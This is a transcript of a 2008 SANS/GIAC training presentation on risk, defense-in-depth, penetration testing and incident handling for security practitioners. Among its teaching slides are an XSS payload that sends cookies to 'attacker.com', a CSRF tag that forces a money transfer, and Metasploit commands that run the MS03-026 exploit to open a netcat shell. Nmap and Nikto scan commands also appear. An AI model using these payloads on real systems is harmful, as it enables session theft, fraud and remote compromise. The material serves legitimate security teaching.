Frontline solutions For Security Practitioners 1008

Frontline Solutions for Security Practitioners SANS/GIAC 2008®

Frontline Solutions for Security Practitioners

A presentation of The Internet Storm Center,

The SANS Institute andThe GIAC Certification

Program

Program Overview - GIAC Certification © 2006Frontline Solutions for Security Practitioners SANS/GIAC 2008® 2

About Me Rick Wanner B.Sc. I.S.P.

• Client Technology Manager, Security at SaskTel• Areas of expertise

– Secure Network Architecture, Penetration Testing– IDS, Policy Development and compliance

• Masters Student at STI (SANS Technology Institute)• Handler at the Internet Storm Center (isc.sans.org)• Independent contractor/Volunteer with SANS/GIAC• [email protected]


The Internet Storm Center

• The Internet Storm Center acts as a distributed early warning system for the Internet

• The ISCs principal inputs come from Dshield.org and Internet users

• The ISC acts as an intermediary with ISPs worldwide.

• The ISC is composed of approximately 40 volunteer handlers which coordinate a group of volunteer intrusion analysts and malware specialists.

• Daily blog/diary published at http://isc.sans.org/• Sponsored by the SANS Institute.


SANS Training andGIAC Certifications

• SANS Institute is the leading training organization for system administration, audit, network, security and security management.

• GIAC, The Global Information Assurance Certification program, provides assurance that a certified individual meets a minimum level of ability and possesses the skills necessary to do the job.


Today’s Cyber Threats

• Cyber threats have certainly changed since Al Gore invented the internet.

• What started off as an innocuous invention by ARPANET and supported by the U.S. Department of Defense, is now a significant vehicle for conducting business, shopping, banking, researching, communicating, and maintaining vital corporate information

• Unfortunately it’s also a haven for hackers and intrusive malicious code.


The Internet

•The Internet is a community of individuals with its good neighbourhoods and bad neighborhoods.

•In this community the bad neighborhoods are only separated from the good neighbourhoods by at most 150 milliseconds.


The Need for Information Security

• While you are working hard to protect your organization’s critical information and systems, there are others out there who want to compromise it.

• Learning the appropriate actions to secure this information not only benefits your employer, clients, and stockholders, it benefits you.

• In this industry, you don’t want to be the one who learned the hard way.


Security Outlook

• As users get more sophisticated, so do the bad guys.• A CA, Inc. report issued on January 29, 2007 stated that:• In 2006, trojans accounted for 62% of all malware; worms 24%; and

viruses and other types of malware accounted for the remaining 13%.

• CA, Inc predicts that attackers will use blended threats to steal private information and perpetrate other attacks– Phishers are getting smarter– Spam will increase– Targeted attacks will increase– A rise in the use of kernel rootkits– Increased exploitation of browser and application vulnerabilities– Typo-squatting on search engines will increase

– Attacks are increasingly sophisticated.


Presentation Overview

• A brief look at risk• Security Mitigation Strategies

– Defense-in-Depth– Penetration Testing– Incident Handling


Focus of Security is Risk

• Security deals with managing risk to your critical assets

• Security is basically an exercise in loss reduction• It’s impossible to totally eliminate risk – we settle

for residual risk• Risk is the probability of a threat crossing or

touching a vulnerability• Risk is managed by applying security controls• Risk = threat x vulnerabilities


Key Focus of Risk

• Confidentiality/Disclosure• Integrity/Alteration• Availability/DestructionConfidentiality

Integrity Availability


Prioritizing CIA

• While all three areas of CIA are important to an organization, there is always one area that is more critical than the others

• Confidentiality– Health care organizations– Hospitals

• Integrity– Financial institutions– Banks

• Availability– E-commerce-based organizations– Online banking


What is a Threat?

• Possible danger• Protect against the

ones that are most likely or most worrisome based on:

• Intellectual property• Business goals• Validated data• Past history• Main point of exposure

Malware Insider

Hea

lth

Epid

emic

NaturalDisasters

Terrorism5 PrimaryThreats


Vulnerabilities

• Vulnerabilities are weaknesses in a system• Vulnerabilities are inherent in complex systems; they will

always be present• The majority of vulnerabilities are the result of poor coding

practices• Lack of error checking• Vulnerabilities are the gateway by which threats are

manifested• Vulnerabilities fall into two categories

– Known – those you can protect against– Unknown or “zero day”


Defense-in-Depth

• We deploy Defense-in-Depth to manage and mitigate risk.


What is Defense-in-Depth?

• There is no “silver bullet” when it comes to network security

• Any layer of protection might fail• Multiple levels of protection must be

deployed• Measures must be across a wide range of

controls (preventive and detective)


Approach to Defense-in-Depth

• Deploy measures to reduce, eliminate, or transfer risk

• Four basic approaches– Uniform protection– Protected enclaves– Information centric– Threat vector analysis


Uniform ProtectionDefense-in-Depth

• Most common approach to DiD• Firewall, VPN, Intrusion Detection,

Antivirus, etc.• All parts of the organization receive equal

protection• Particularly vulnerable to malicious insider

attacks


Protected EnclavesDefense-in-Depth

• Work groups that require additional protection are segmented from the rest of the internal organization

• Restricting access to critical segments• DOE “unclean” network• System of VPNs• Internal Firewalls• VLANs and ACLs


Information CentricDefense-in-Depth

• Identify critical assets and provide layered protection

• Data is accessed by applications

• Applications reside on hosts

• Hosts operate on networks

Info

Application

Host

Network


Vector-OrientedDefense-in-Depth

• The threat requires a vector to cross the vulnerability

• Stop the ability of the threat to use the vector:– USB Thumb Drives – Disable USB– Floppy Drives – Disable– Auto Answer Modems – Digital phone

PBX


Identity, Authentication, Authorization, and

Accountability• Identity is who you claim to be• Authentication is a process by which you prove

you are who you say you are:• Something you know• Something you have• Something you are• Some place you are

• Authorization is determining what someone has access to or is allowed to do after authentication

• Accountability deals with knowing who did what and when


Controlling Access

• Least Privilege– Give someone the least amount of access required to

do their job• Need to Know

– Only give them the access when they need it – and take it away when it is no longer required

• Separation of Duties– Break critical tasks across multiple people to limit your

points of exposure• Rotation of Duties

– Change jobs on a regular basis to prevent anyone from being able to get comfortable in a position and therefore, be able to cover their tracks


“Protection is ideal, detection is a must”

• You cannot protect against every possible threat.

• Instrument your security so that you can detect the threat or at very least so you have data available to analyze the attack after the fact.


Penetration Testing

• Penetration testing is discovering vulnerabilities to your networks, systems, applications and data before the bad guys do.

• Penetration testing simulates the generalized attack methodology.


Generalized Attack Methodology

• Reconnaissance• Scanning• Gaining Access• Maintaining Access• Covering Tracks


Penetration Testing Method

• Preparation• Reconnaissance• Scanning• Exploitation• Analysis• Reporting


Preparation

• Define the parameters of the test.– Objectives– Scope– Roles and responsibilities– Limitations– Success factors– Timeline– Documented Permission


Reconnaissance

• Reconnaissance determines…”What can a potential attacker learn about your company?”

• Utilizes publicly available information.


Reconnaissance (2)

• Some sources of information:– Search Engines– Websites– Registrars– SEC– Recruiting sites– Netcraft.com


Reconnaissance (3) - Netcraft


Reconnaissance (4) - Netcraft


Scanning

• Now we know where to look, let’s dig in a little deeper.

• Generally you are going to use two types of scanners, port scanners, and vulnerability scanners.

• The hackers choice:– Nmap– Nessus


Nmap

• Nmap – open sourced port scanner

• Usually start with discovery scans and progress to targeted scans.

• Runs on Windows and *nix.• Available from nmap.org


Nmap - Discovery

• nmap –F <Address>• nmap –F

192.168.1.0/24


Nmap - Targeted

• nmap -F –A <address>• nmap -F –A 192.168.1.200


Vulnerability Scanner

• Nessus –open sourced VA scanner

• Vulnerability feed costs money.


Commercial Vulnerability Scanners

Rapid7 NeXpose

GFI LANguardeEye Retina Network


Application Attacks

• Now we have all these layers of protection. Are you still vulnerable?

• The fact is that you can’t deny what you must permit.

• What about application level attacks?


Cross-Site Scripting

• Allows code injection by malicious web users into the web pages viewed by other users.

• Root cause - lack of input filtering and validation

• Permits attacker to execute arbitrary scripts on the browser


Cross Site Scripting (2)

• Code<script>document.write(‘<img

src=http://www.attacker.com/’ + document.cookie + ‘>’)</script>

• Result192.168.231.131 - - [21/Jan/2008:10:36:31 -0500] "GET/PHPSESSID=b37a25a01745b6d2a5df876e45dabf60

HTTP/1.1" 404 240


Cross-Site Scripting (3)


Yahoo's HotJobs site vulnerable to cross-site scripting attack

Dan Kaplan - October 27 2008

Internet research firm Netcraft's toolbar has detected a cross site scripting bug in Yahoo that could be exploited to steal authentication cookies.

The flaw resides on Yahoo's HotJobs search engine site, on which hackers embedded malicious JavaScript code, Netcraft's Paul Mutton said in a blog post on Sunday.

"The script steals the authentication cookies that are sent for the Yahoo.com domain and passes them to a different website in the United States, where the attacker is harvesting stolen authentication details," Mutton wrote.

The pilfered credentials could enable the attackers access to the victims' Yahoo acounts, including email. This vulnerability is similar to another bug that affected Yahoo earlier this year, he said.

"Simply visiting the malign URLs on Yahoo.com can be enough for a victim to fall prey to the attacker, letting him steal the necessary session cookies to gain access to the victim's email — the victim does not even have to type in their username and password for the attacker to do this," Mutton wrote. "Both attacks send the victim to a blank webpage, leaving them unlikely to realize that their own account has just been compromised."


Cross Site Scripting Demo

• Steals the session cookie and then masquerades as the user.


Cross-Site Request Forgery (XSRF)

• Unauthorized commands are transmitted from a user that the website trusts.

• Exploitation of an existing web session.

• Embedded code causes unauthorized actions


XSRF (2)

• Code<img

src=http://www.acmefinancial.com/transaction.php?src_acct=0128428&dst_acct=0183718&amount=5000>

• Result192.168.231.131 - - [21/Jan/2008:12:33:31 -0500]

"GET/transaction.php?src_acct=0128428&dst_acct=0183718&amount=5000 HTTP/1.1" 200 2240


SQL Injection Demo

• SQL statements are injected into user input to see if a response is returned.

• Extreme Defense in Depth– Firewall, network segmentation– System patching, SSL communications

• Results– Authentication Bypass– Unauthorized data access


Preventing Web Application Attacks

• Every input should be validated!• “Suspicion Breeds Confidence”

– Test it!


Nikto

• Open source Linux based web application scanner

• Available at http://www.cirt.net/nikto2


Nikto (2)

• Basic Scanperl nikto.pl –h <host>perl nikto.pl –h 192.168.1.1

• Multiple portsperl nikto.pl –h 192.168.1.1 –p

80,88,443


Nikto – Simple Scan

[root@rwanner nikto]# ./nikto.pl -h localhost- Nikto v2.03/2.04---------------------------------------------------------------------------+ Target IP: 127.0.0.1+ Target Hostname: localhost+ Target Port: 80+ Start Time: 2008-10-27 21:53:47---------------------------------------------------------------------------+ Server: Apache/2.2.6 (Fedora)- Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE+ OSVDB-877: HTTP method ('Allow' Header): 'TRACE' is typically only used for debugging and should be disabled. This

message does not mean it is vulnerable to XST.+ Apache/2.2.6 appears to be outdated (current is at least Apache/2.2.9). Apache 1.3.39 and 2.0.61 are also current.+ OSVDB-682: GET /usage/ : Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting

(XSS). http://www.cert.org/advisories/CA-2000-02.html.+ OSVDB-877: TRACE / : TRACE option appears to allow XSS or credential theft. See http://www.cgisecurity.com/whitehat-

mirror/WhitePaper_screen.pdf for details+ OSVDB-3092: GET /manual/ : Web server manual found.+ OSVDB-3268: GET /icons/ : Directory indexing is enabled: /icons+ OSVDB-3268: GET /manual/images/ : Directory indexing is enabled: /manual/images+ OSVDB-3233: GET /icons/README : Apache default file found.+ 3577 items checked: 9 item(s) reported on remote host+ End Time: 2008-10-27 21:54:28 (41 seconds)


Nikto (3)

• Multiple hostsperl nikto.pl –h <filename>perl nikto.pl –h hosts.txt

• Hosts file192.168.1.1:80:443192.168.0.200192.168.0.200,443


Nikto – Multiple Hosts Scan

]# ./nikto.pl -h hosts.txt- Nikto v2.03/2.04---------------------------------------------------------------------------+ Target IP: 192.168.1.1+ Target Hostname: 192.168.1.1+ Target Port: 443---------------------------------------------------------------------------+ SSL Info: Ciphers: DES-CBC3-SHA Info: /C=US/ST=California/L=Irvine/O=Cisco-Linksys,

LLC/OU=Division/CN=Linksys/[email protected] Subject: /C=US/ST=California/L=Irvine/O=Cisco-Linksys,

LLC/OU=Division/CN=Linksys/[email protected]+ Start Time: 2008-10-28 21:16:37---------------------------------------------------------------------------+ Server: No banner retrieved


Commercial Web Scanners

IBM Rational AppScanHP Webinspect

Cenzic Hailstorm


Exploitation

• Once you identify a potential vulnerability you have choices:– Can use individual exploits…available via

the Internet– Can use pre-built exploitation frameworks.

• The most popular exploitation framework is Metasploit.– Available for Windows or Linux– Available at http://www.metasploit.com/


Metasploit

• 3 primary components– Exploit

• Stack/Heap based buffer overflow• Insecure coding• PHP vulnerability, IIS Unicode, SQL injection, etc.

– NOP sled (optional - exploit dependent)

– Payload• Shellcode• Encoders• Other (exploit dependent)


Metasploit

#./msfconsole start Metasploitmsf > use windows/dcerpc/ms03_026_dcommsf > setg PAYLOAD windows/execmsf > setg CMD nc –L –p 80 cmd.exemsf > setg RHOST 192.168.0.2msf > exploit


Exploitation Demo

• Patching and Configuration– Lacking patch management procedures– Single inbound port open through

firewall• Results

– Simple remote exploitation– Worm characteristics– Can be used to bypass firewalls


Commercial Tools

Core Impact


Analysis

• When you finish you will have a mountain of data to analyze.

• Break it down by a risk based approach.


Reporting

• Base your report on risk.• Write it so your senior executives

can understand.• Provide recommendation based on

standards or best practices.• Keep the Executive summary short.• Stay away from FUD!


Handling an Incident

• Now that you are aware of threats, let’s take a look at how to handle an incident once it occurs.


What Is Incident Handling?

• Incident Handling is an action plan for dealing with the misuse of computer systems and networks:– Intrusions– Malicious code infection– Cyber-theft– Denial of Service– Other security-related events• Have written procedures and policies in place so

you know what to do when an incident occurs.


Why is Incident Handling Important?

• Sooner or later an incident is going to occur– Do you know what to do?

• It is not a matter of “if” but “when”• Planning is everything• Similar to backups

– You might not use them everyday, but if a major problem occurs, you are going to be glad that you have them available


Incident Definition

• The term “incident” refers to an adverse event in an information system and/or network…

• …or the threat of the occurrence of such an event

• Focus is on detecting deviations from the normal state of the network and systems

• Examples of incidents include:– Unauthorized use of another user’s account– Unauthorized use of system privileges– Execution of malicious code that destroys data

• Incident implies harm, or the attempt to harm


Event Definition

• An “event” is any observable occurrence in a system and/or network

• Examples of events include:– The system boot sequence– A system crash (could be normal behavior for that system)– Packet flooding within a network (could be bursty legit traffic)

• These observable events provide the bulk of your organization’s case if the perpetrator of an incident is caught and prosecuted – Must be recorded in notebooks and logs– Recording the same event in multiple places helps improve evidence –

that’s corroborating evidence


Incident Handling Phases

• Preparation– Create the incident handling team, implement policy, allocate

resources– Prepare how incidents are communicated

• Identification– Detect incidents through alerts and audit logs on network perimeter,

host perimeter, and host systems– Enforce a need-to-know policy– Out of band communications, such as cell phones, may be appropriate

if the network has been compromised

• Containment– Stop the bleeding– Survey the situation and inform management


Incident Handling Phases

• Eradication– Remove artifacts of the incident and determine the cause– Perform a recovery from known-good backups (rebuild in the

case of a rootkit installation)– Improve network and host defenses appropriately

• Recovery– Place the system back into production– Validate the system integrity and function– Monitor for further suspicious events

• Lessons Learned– Create a follow-up report and look for ways to improve the

incident handling processes


Six Primary Phases

Preparation

Identification

Containment

Eradication

Recovery

Lessons Learned

Declare an Incident

Start Clean-Up

Finish Clean-Up

Back in Production

Done

Steady State

Steady State

On occasion, we may be forced to jump back…


Data Recovery Demo

• Incident Recovery– Data deleted from a system– Could be accidental or malicious

• Recovery Steps– Bit-for-bit image of storage device– Data recovery using autopsy


Seven Deadly SinsChronological Order

1. Failure to report or ask for help2. Incomplete/non-existent notes3. Mishandling/destroying evidence4. Failure to create working backups5. Failure to contain or eradicate6. Failure to prevent re-infection7. Failure to apply lessons learned


Incident Handling Summary

• Incident Handling is similar to first aid• The caregiver is under pressure and mistakes can be costly• A simple, well-understood documented approach is best• Keep the six stages in mind – Preparation Identification,

Containment, Eradication, Recovery, and Lessons Learned• Use pre-designed forms, and ask for help

– http://www.sans.org/score/incidentforms– Forms include Incident Contact List, Identification

Checklist, Survey, Containment Checklist, Eradication Checklist, and Communication Log


Share Your Experiences

• If your computer policy will allow it, share what you have learned with other incident handlers and response teams– Attacks against computers are happening everywhere,

all the time– The bad guys share information; if we incident handlers

do not share with each other, they’ll stay a step ahead– Coordinating your efforts with those on other teams is a

critical facet of incidence response– Do as they told you in kindergarten: Share– The Internet Storm Center (isc.sans.org) is a wonderful

point of communication. A handler is on duty everyday


How To Apply This Information

• This material is a starting point to create a set of incident handling procedures tailored to your environment

• Remember, incident handling is not a “one-size-fits-all” activity– But there are common principles we all must consider

• As you work through the process, ask yourself:– “If an incident occurred, would I be really thankful I had

done that?”– “Would I be really sorry if I hadn’t done that?”


Presentation Summary

• Security programs should be about risk, not technology, not FUD.

• “Protection is ideal, detection is a must.”

• Know what the attackers know.• Be prepared for when an attack

does come.


What We’ve Learned

• The information you have learned today comes from three of SANS’ most popular security courses.

• Defense-in-Depth is part of SEC401: Security Essentials - Bootcamp Style or GSEC

• The penetration testing overview is related to SEC560: Network Penetration Testing and Ethical Hacking or GPEN.

• The incident handling overview is based on SEC504: Hacker Techniques, Exploits and Incident Handling or GCIH.


Free GIAC Assessment

• We’ve covered a lot of information today. To help reinforce what you’ve learned and test your knowledge, we have created a short 20 question assessment.

• If you would like to take advantage of this free GIAC assessment, please write your name and email address on the sign up sheet.

• Within the next 10 days, GIAC will send you an email with a link to access the assessment, but you will not be placed on our mailing list unless you opt-in.


SANS/GIAC Overview


SANS Training andGIAC Certifications

• SANS Institute is the leading training organization for system, audit, network, and security.

• GIAC, The Global Information Assurance Certification program, provides assurance that a certified individual meets a minimum level of ability and possesses the skills necessary to do the job.


SANS and GIACGuiding Principles

• Education– Current, Evolving and Proven Material– Certifications that prove you have the

knowledge and skills to get the job done• Hands-On

– Hands-on training conducted by instructors who are experts in their fields

– Testing process that evaluates hands-on capabilities

• Community– Listening and learning to the community’s

needs– Giving vital knowledge back to the

community


How SANS and GIAC Are Different From Other Training/Certifications

• SANS and GIAC constantly update course and certification information to keep you on top of current threats and vulnerabilities.

• We use real-world, hands-on scenarios.• While tools are an important part of IT

security, we teach you and validate actual skills, so you don’t have to solely rely on the performance of a tool.

• The SANS Promise - You will be able to apply our information security training the day you get back to the office.


82

GIAC Certification

GIAC Silver Certifications – Multiple choice exams only

GIAC Gold Certifications – Plus a written technical report

GIAC Platinum Series – Highest certification level


Top 3 Reasons to Earn Your GIAC Certification

1.Hiring managers use GIAC certifications to ensure that candidates actually possess deep technical skills

2.GIAC certifications help IT Security Professionals get promoted faster and earn more money

3.GIAC certification reinforces and affirms the 'hands on' knowledge you possess


What Certified People Say?

"The GIAC certification has enabled me to take the next step in my Information Security career. It allowed me to prove that my value was more than just that of a security minded Sys Admin."–J. Klein, Enterprise Information Systems, Cedars-Sinai Medical Center

"The SANS hands-on experience and the intensive GIAC certification process has garnered me the respect of my boss and peers. Now, when I speak, people listen. I have the confidence to get the job done. My boss looks at me with respect that simply wasn't there before SANS training and GIAC certification. Not only my boss, but managers and peers at other large organizations.“ Matt Carpenter, Enterprise Information Systems

GIAC certifications help IT Security Professionals get promoted faster and earn more money…


GIAC Certifications

• GSEC - Security Essentials

• GCFW - Firewall Analyst• GCIA - Intrusion Analyst• GCIH - Incident Handler• GCFA - Forensics Analyst• GCUX - Unix Security• GCWN - Windows

Security• GNET - . NET• GSOC - Securing Oracle• GSSP-JAVA - Secure

Coding• GSSP-C - Secure Coding

• GISF - Information Security Fundamentals

• GSAE - Security Audit Essentials• GSLC - Security Leadership• GSNA - System & Network Auditor• G7799 - ISO 17799/27001• GISP - Information Security

Professional• GCIM - Incident Manager• GAWN - Auditing Wireless Networks• GREM - Reverse-Engineering

Malware• GPEN - Penetration Tester• GCPM - IT Project Management

For a complete list of GIAC Certificationshttp://www.giac.org/certifications/roadmap.php


Free Resources

• SANS and GIAC have a variety of free resources readily available at www.sans.org and www.giac.org

• Here’s a sample of what we offer:• Internet Storm Center• SANS reading room - http://www.sans.org/reading_room• Top 15 Malicious Spyware Actions• SANS Security Policy Samples • The Internet Guide to Popular Resources on Information Security• FAQ’s• SCORE• Security Tool White Papers and GIAC Gold Papers• Glossary of Security Terms


Questions: [email protected]@giac.org

Thank You!

Frontline solutions For Security Practitioners 1008

Technology

Transcript of Frontline solutions For Security Practitioners 1008